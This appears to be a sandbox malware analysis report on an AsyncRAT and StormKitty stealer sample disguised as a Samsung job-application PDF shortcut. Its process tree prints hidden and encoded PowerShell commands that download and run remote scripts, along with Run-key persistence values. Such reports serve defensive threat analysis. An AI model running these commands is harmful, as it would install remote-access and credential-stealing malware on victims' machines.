asyncrat | eb43edc52b7358dd993e2e6343ae4f59492e4b95651ed7877e17da1f5d214ba6

Analysis

max time kernel
147s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2024 11:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Samsung_Job_Application_Document.pdf.lnk
Size

47.7MB
MD5

c2dbb808a94f755506367a63757d3007
SHA1

9dc8794486160c1b282f50b1e2aa234c77c17c84
SHA256

b55282e00322a4e28d888c1c252218251366f45639ba5212829e4b3d25dbc50e
SHA512

c59e52c3b7b74ab5b88d7a8b17a8c8aaaf3aaf9af07dd838d6b785442fef4811e1c01f4aa136e0eef631bce636b9fa652a12a968aa3114d03d911557658370e9
SSDEEP

24:8DiJ6Kx96xxuJB5J+/ZehoCiyng48HGbuOk6OYuOdZqddqVRVXuHYSJmrS:8DhKzhJPQ+oAg6SOHOxOdkd0tXuHdJ2

Score

10^/10

asyncrat stormkitty defense_evasion discovery execution persistence rat stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/4712-99-0x0000000000400000-0x000000000064A000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	4448	powershell.exe
17	1276	powershell.exe
28	4748	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4040	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1524	EdgeServices.exe
4016	ChromeServices.exe

Loads dropped DLL 6 IoCs

pid	Process
1524	EdgeServices.exe
1524	EdgeServices.exe
1524	EdgeServices.exe
1524	EdgeServices.exe
1524	EdgeServices.exe
4016	ChromeServices.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeServices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\EdgeServices\" \"C:\\Users\\Public\\Downloads\\EdgeServices\\EdgeServices.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeServices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\ChromeServices\" \"C:\\Users\\Public\\Downloads\\ChromeServices\\ChromeServices.exe\""	powershell.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 1524 set thread context of 4712	1524	EdgeServices.exe	106
PID 1524 set thread context of 4300	1524	EdgeServices.exe	110
PID 1524 set thread context of 1060	1524	EdgeServices.exe	112
PID 1524 set thread context of 1528	1524	EdgeServices.exe	116
PID 1524 set thread context of 116	1524	EdgeServices.exe	120
PID 1524 set thread context of 4588	1524	EdgeServices.exe	123
PID 1524 set thread context of 4764	1524	EdgeServices.exe	125

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msbuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	installutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regasm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regasm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regasm.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
4040	powershell.exe
4040	powershell.exe
4448	powershell.exe
4448	powershell.exe
1276	powershell.exe
1276	powershell.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
116	regasm.exe
116	regasm.exe
116	regasm.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
116	regasm.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	1528	regasm.exe
Token: SeDebugPrivilege	4712	AddInProcess32.exe
Token: SeDebugPrivilege	4764	installutil.exe
Token: SeDebugPrivilege	1060	installutil.exe
Token: SeDebugPrivilege	4588	msbuild.exe
Token: SeDebugPrivilege	116	regasm.exe
Token: SeDebugPrivilege	4300	regasm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2120	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
2120	AcroRd32.exe
116	regasm.exe
2120	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 2432	2040	cmd.exe	83
PID 2040 wrote to memory of 2432	2040	cmd.exe	83
PID 2432 wrote to memory of 4040	2432	cmd.exe	84
PID 2432 wrote to memory of 4040	2432	cmd.exe	84
PID 4040 wrote to memory of 4448	4040	powershell.exe	85
PID 4040 wrote to memory of 4448	4040	powershell.exe	85
PID 4448 wrote to memory of 2120	4448	powershell.exe	88
PID 4448 wrote to memory of 2120	4448	powershell.exe	88
PID 4448 wrote to memory of 2120	4448	powershell.exe	88
PID 4040 wrote to memory of 1276	4040	powershell.exe	89
PID 4040 wrote to memory of 1276	4040	powershell.exe	89
PID 2120 wrote to memory of 2928	2120	AcroRd32.exe	93
PID 2120 wrote to memory of 2928	2120	AcroRd32.exe	93
PID 2120 wrote to memory of 2928	2120	AcroRd32.exe	93
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 3584	2928	RdrCEF.exe	96
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97
PID 2928 wrote to memory of 428	2928	RdrCEF.exe	97

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Samsung_Job_Application_Document.pdf.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c PowerShell -WindowStyle Hidden -Command "IEX (Get-Content (Get-ChildItem -Path C:\ -Filter 'Samsungwork.bin' -Recurse -Force -ErrorAction SilentlyContinue | Select-Object -First 1).FullName -Raw)"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -WindowStyle Hidden -Command "IEX (Get-Content (Get-ChildItem -Path C:\ -Filter 'Samsungwork.bin' -Recurse -Force -ErrorAction SilentlyContinue | Select-Object -First 1).FullName -Raw)"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvAHMAdABvAHIAYQBnAGUALwBTAGEAbQBzAHUAbgBnAF8AcABkAGYALgB0AHgAdAAnACkA
      4⤵
      Blocklisted process makes network request
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4448
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Samsung Application Document.pdf"
        5⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2120
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2928
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4E5F307CFDCEA90A3037CDE3372B1ABB --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3584
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F526896CE502616F7BD2386930D8698D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=F526896CE502616F7BD2386930D8698D --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:428
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0F19585FEC1299CC48EE8268C49EB973 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4876
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0DD6705B01021D6E9AFB10E9791A587E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0DD6705B01021D6E9AFB10E9791A587E --renderer-client-id=5 --mojo-platform-channel-handle=1940 --allow-no-sandbox-job /prefetch:1
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3340
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A32390BC442309500C0E501A5749C2D3 --mojo-platform-channel-handle=2704 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4352
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E8BEBEF6A628DC8A46A88A87B7CB52C3 --mojo-platform-channel-handle=2804 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AcwBhAG0AcwB1AG4AZwAtAHcAbwByAGsALgBjAG8AbQAvAHMAdABvAHIAYQBnAGUALwBTAGEAbQBzAHUAbgBnAC4AdAB4AHQAJwApAA==
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1276
    - - C:\Users\Public\Downloads\EdgeServices\EdgeServices.exe
        
        "C:\Users\Public\Downloads\EdgeServices\EdgeServices.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1524
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4712
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:2728
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
        
        PID:4628
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        6⤵
        
        PID:2932
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4300
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:2308
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1060
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:2312
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
        
        PID:2296
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        6⤵
        
        PID:2036
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1528
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:3948
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
        
        PID:4256
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        6⤵
        
        PID:3056
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:116
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:3316
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
        
        PID:3452
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4588
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:2668
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
